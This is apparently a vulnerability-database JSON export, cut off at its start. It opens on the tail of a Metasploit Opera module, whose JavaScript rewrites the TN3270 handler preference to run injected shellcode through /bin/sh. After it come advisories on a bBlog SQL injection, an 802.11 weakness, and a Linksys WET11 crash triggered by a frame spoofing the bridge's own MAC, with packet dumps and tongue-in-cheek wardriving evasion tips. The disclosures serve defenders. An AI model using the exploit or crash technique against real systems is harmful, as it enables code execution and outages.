\"config_iframe.setAttribute('id', 'config_iframe_window');\" +\n \"config_iframe.src = 'opera:config';\" +\n \"document.body.appendChild(config_iframe);\" +\n \"cache_iframe = document.createElement('iframe');\" +\n \"cache_iframe.src = 'opera:cache';\" +\n \"cache_iframe.onload = function ()\" +\n \"{\" +\n \"\tconfig_iframe_window.eval\" +\n \"\t(\\\\\"\" 
+\n \"\told_handler = opera.getPreference('Network','TN3270 App');\" +\n \"\told_pref = opera.getPreference('User Prefs','Run TN3270 In Terminal');\" +\n \"\tshellcode = '#{shellcode}';\" +\n \"\topera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));\" +\n \"\topera.setPreference('User Prefs','Run TN3270 In Terminal','0');\" +\n \"\tapp_link = document.createElement('a');\" +\n \"\tapp_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');\" +\n \"\tapp_link.click();\" +\n \"\tsetTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);\" +\n \"\tsetTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);\" +\n \"\t\\\\\");\" +\n \"};\" +\n \"document.body.appendChild(cache_iframe);\" +\n\"\");\nENDJS\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/opera_configoverwrite.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "Servers.co.nz Security Advisory SCN200409-1\r\nAvailable in HTML format at \r\nhttp://www.servers.co.nz/security/SCN200409-1.php\r\n------------------------------------------------------------\r\n\r\nSQL Injection vulnerability in bBlog 0.7.3\r\n\r\nAuthor: James McGlinn, Servers.co.nz Ltd <james_at_servers dot co dot \r\nnz>\r\nDiscovery Date: September 28, 2004\r\nPackage: bBlog\r\nVersions Affected: 0.7.2, 0.7.3\r\nSeverity: Severe - a remote user can gain administrative privileges.\r\n\r\n------------------------------------------------------------\r\n\r\nProblem: There is an SQL Injection vulnerability in versions of bBlog \r\nprior to 0.7.3, which can be exploited to gain administrative access if \r\nregister_globals is enabled on the web server.\r\n\r\nIntroduction: bBlog is a blogging system written in PHP and released \r\nunder the GPL. 
It is used by thousands of bloggers worldwide and has \r\nfeatures not found on other blogging systems including advanced comment \r\nspam prevention and threaded comments.\r\n\r\nDiscussion: The array $p is not initialised before being populated and \r\npassed to $bBlog->make_post_query() on line 30 of rss.php. In an \r\nenvironment where register_globals is enabled, $p can be introduced to \r\nthe script with unfiltered elements from user input.\r\n\r\nUsing a specially crafted URL, POST data or cookie a remote user can \r\ngain access to the admin user's access credentials. Exploit withheld at \r\nproject maintainer's request.\r\n\r\nSolution: This issue is fixed as of version 0.7.4. A patch for rss.php \r\nof version 0.7.3 is available at the URL below:\r\nhttp://www.servers.co.nz/security/patches/SCN200409-1/rss.php-patch.txt\r\n\r\n------------------------------------------------------------\r\n\r\nABOUT SERVERS.CO.NZ LTD\r\n\r\nServers.co.nz are leaders in the design, implementation & auditing of \r\neffective online information systems for SMEs.\r\n\r\nPhone: (NZ) 0800 4 SERVERS\r\n\r\n------------------------------------------------------------\r\n\r\n\r\nJames McGlinn\r\nProject Manager\r\nBCom, BSc, Zend Certified Engineer (PHP)\r\n\r\nServers.co.nz Ltd\r\n68 Shortland St, Auckland PO Box 3688 Shortland St, Auckland, New \r\nZealand\r\nPhone: 0800 4 SERVERS Fax: +64 9 358 5187\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "modified": "2004-10-01T00:00:00", "published": "2004-10-01T00:00:00", "id": "SECURITYVULNS:DOC:6909", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6909", "title": "[Full-Disclosure] SQL Injection vulnerability in bBlog 0.7.3", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "By using Clear Channel Assessment 
procedure weakness attacker equipped with standard client card can prevent data transmission over network.", "modified": "2004-05-13T00:00:00", "published": "2004-05-13T00:00:00", "id": "SECURITYVULNS:VULN:3688", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3688", "title": "IEEE 802.11 collision avoidance procedure weakness", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:06", "bulletinFamily": "software", "description": "\r\nenZo Notice\r\nDate: 24/10/02\r\nProduct: Linksys WET11 (Wireless Bridge)\r\nMentioned By: netmask\r\nFirmware Versions: 1.3.2, 1.3.1\r\nAdvisory Url: http://www.enZotech.net/advisories/linksys.wet11.txt\r\nProblem: Linksys WET11 crashes when sent an ethernet frame from its own MAC address\r\nRisk: To each his own.. But we say low.. It's just a DoS. Hell,\r\n speaking on 802.11 security, this may actually be a positive impact\r\n vulnerability, and increase your security =)\r\n\r\n\r\n\r\n ZZZZZZZZZZZZZZZZZZZ\r\n Z:::::::::::::::::Z\r\n nnnn nnnnnnnn Z:::::::::::::::::Z ooooooooooo\r\n n:::nn::::::::nn Z:::ZZZZZZZ::::::Z oo:::::::::::oo\r\n eeeeeeeeeee n::::::::::::::nn ZZZZZ * Z::::::Z o:::::::::::::::o\r\n ee:::::::::::eenn:::::::::::::::n 2 Z:::::Z o:::::ooooo:::::o\r\n e:::::::::::::::een:::::nnnn:::::n 0 Z:::::Z o::::o o::::o\r\n e::::::eeeee::::::en::::n n::::n 0 Z:::::Z o::::o o::::o\r\n e:::::e e:::::en::::n n::::n 2 Z:::::Z o::::o o::::o\r\n e::::::eeeee::::::en::::n n::::n * Z:::::Z o::::o o::::o\r\n e::::::::::::::::e n::::n n::::n Z:::::Z o:::::ooooo:::::o\r\n e:::::eeeeeeeeeee n::::n n::::nZZZ:::::Z ZZZZZo:::::::::::::::o\r\n e::::::e n::::n n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo\r\n e:::::::e nnnnnn nnnnnnZ:::::::::::::::::Z ooooooooooo\r\n e:::::::eeeeeeeeee Z:::::::::::::::::Z\r\n ee::::::::::::::e ZZZZZZZZZZZZZZZZZZZ\r\n ee:::::::::::::e \... www.enZotech.net .../\r\n eeeeeeeeeeeeee\r\n\r\n The above is radical ascii art..\r\n Yet again.. 
The Below is a lame Discovery.\r\n\r\n\r\n\r\n\r\n\r\n*** Product information:\r\n\r\nThe Linksys WET11 is an Ethernet to 802.11b bridge. It can bridge a single\r\nhost, or an entire network (Up to 50 machines). If you are in a situation\r\nwhere wireless is appropriate for you, these can be handy devices. Whether\r\nit's just hooking up your PS2 or Xbox to the lan, or letting your neighbor\r\nconnect his entire network to yours, this device will let you do it. It's\r\na small device, the size of 1991 style Walkman, with a detachable SMC\r\nantenna. Web based configuration, supporting 64/128 bit WEP, Ad-Hoc or\r\ninfrastructure mode, Modifiable transmission rates, DHCP client for unit\r\nIP, and a few more features.\r\n\r\nOverall, for a price of $100, this device is fairly neat for those who are\r\nwilling to have 802.11 on their network.. Or, to stick your neighbor or\r\nxbox/PS2 in your DMZ. I'm really not interesting in going over the "802.11\r\ncan't be secured" discussion, that's not the point here. However, one\r\nother nice feature to mention.. is the devices usefulness in a war driving\r\nsituation. If you have 1 Cisco 350 card, and 1 15dB Antenna.. But four\r\npeople.. This $100 device, could save quite a bit of money, and let\r\neveryone get the benefits of your single antenna. When Kismet picks up a\r\nnetwork, you quickly reconfigure your unit to sit on it. Allowing everyone\r\nin the van to use regular ethernet cards, and you move the antenna over to\r\nunit, and everyone is set. 
While we don't condone accessing networks that\r\nare not your own, if you were to do such a thing, you should keep in mind\r\nyou can NOT change the MAC address on this device, and you may end leaving\r\nyour device MAC address in logs around the area, which could incriminate\r\nyou later when federal officers are doing their jobs, and kick in your\r\ndoor.\r\n\r\n\r\n\r\n*** Data:\r\n\r\nWhen configuring a WET11, you have to run their Windows application to do\r\nthe initial configuration, which is configured entirely by UDP\r\nbroadcasting. The first thing the software does, is probe for devices on\r\nthe network by broadcasting to port 4000 of 255.255.255.255:\r\n\r\nPacket Analysis (This is really unrelated to the problem,\r\n I just thought I'd include it out of boredom)\r\n\r\n\r\nProbe Packet:\r\n<UDP headers snipped>\r\n16 bytes:\r\n\r\n87 65 43 21 11 00 00 01 /* This data isn't clear.. Everything but the 6th byte\r\n is identical to the first 8 bytes of the response\r\n packet */\r\na0 00 0d c9 e7 7c /* MAC Address of your machine */\r\n00 00 /* NUL */\r\n\r\n\r\nResponse Packet:\r\n<UDP headers snipped>\r\n120 bytes:\r\n\r\n87 65 43 21 11 10 00 01 /* Everything but the 6 byte is the same as the\r\n first 8 in the Probe packet */\r\na0 00 0d c9 e7 7c /* MAC address of the requesting machine */\r\n00 06 25 02 e4 71 /* MAC address of the WET11 */\r\n45 53 33 30 30 62 /* Ascii: ES300b */\r\n00 /* NUL */\r\n10 6c 69 6e 6b 73 79 73 /* Ascii: linksys */\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 /* NUL */\r\n06 10 0e c0 a8 01 e1 /* unknown data, can be removed */\r\n\r\n4c 69 6e 6b 73 79 73 20 57 45 54 31 31 /* SSID of unit, Default is\r\n "Linksys WET11" */\r\n\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 00 00 /* NUL */\r\nff ff ff 00 /* Netmask 255.255.255.0 */\r\nc0 a8 01 01 /* 192.168.1.1 (Default gw. 
The\r\n unit default IP is 192.168.1.225) */\r\na6 e7 94 7f 8c 4b 9a ec /* This data changes on every response.. */\r\na5 13 87 /* This data changes on every response.. */\r\n\r\n\r\nIf you replay the response packet to the broadcast (Or modify the\r\nDestination address in the header to the actual unit IP)... The unit crashes\r\nright away.. Stops responding completely. At this point you have to hard\r\ncycle the unit.\r\n\r\nYou don't really have to replay the packet, it's just an easy way of doing\r\nit.. The actual problem is the unit doesn't know what to do when Source\r\nMAC in the DLC header is the same as it's own. Really all you have to\r\ndo is forge a packet to a broadcast address, or directly to the unit,\r\nusing it's MAC in the ethernet frame, and the unit will crash. You don't have\r\nto hit it on an open port (udp 4000, tcp 80). You just have to use\r\nit's MAC in your header, and send direct or broadcast that packet. We only\r\ntested with UDP.\r\n\r\n\r\n*** Exploiting:\r\n\r\nAs it says above, forge it's MAC in the DLC header, and hit it\r\nwith a packet, and it's gone. Over the weekend we'll toss up a\r\nconfiguration application for the device that lets you do the same\r\nthing the Windows software does, and may just include the option in\r\nthere. Look for it at http://www.enZotech.net/\r\n\r\n\r\n*** Solution:\r\n\r\nWait for Linksys to release a firmware upgrade. Or maybe they won't\r\nsee this as a problem.\r\n\r\n\r\n*** Workaround:\r\n\r\nUnplug your unit.. We guess. Or more likely, don't be bothered\r\nby this.. Because really, who cares?\r\n\r\n*** Initial Report Information:\r\n\r\nAdvanced notice wasn't given because this bug wasn't determined to be very\r\ncritical. These devices are fairly new, and the chance of attack isn't that\r\ngreat. 
Further, we didn't bother because in the past, Linksys hasn't bothered\r\nto respond to security problems.\r\n\r\n*** Miscellaneous:\r\n\r\nIt is also recommended to disable the "Allow Upgrade Uploads" option,\r\nunder the Admin tab in the web configuration. This is on by default. While\r\nthere were no security issues found in this feature, it does open up tftp\r\non the device when enabled, and might as well disable it.\r\n\r\n\r\n\r\n\r\nnetmask of enZo\r\nhttp://www.enZotech.net\r\n\r\n", "modified": "2002-10-26T00:00:00", "published": "2002-10-26T00:00:00", "id": "SECURITYVULNS:DOC:3688", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3688", "title": "Linksys WET11 crashes when sent an ethernet frame from its own MAC address", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:17", "bulletinFamily": "software", "description": "Gate crashes on receiving Ethernet packet from own MAC.", "modified": "2002-10-26T00:00:00", "published": "2002-10-26T00:00:00", "id": "SECURITYVULNS:VULN:2371", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2371", "title": "Linksys WET11 DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}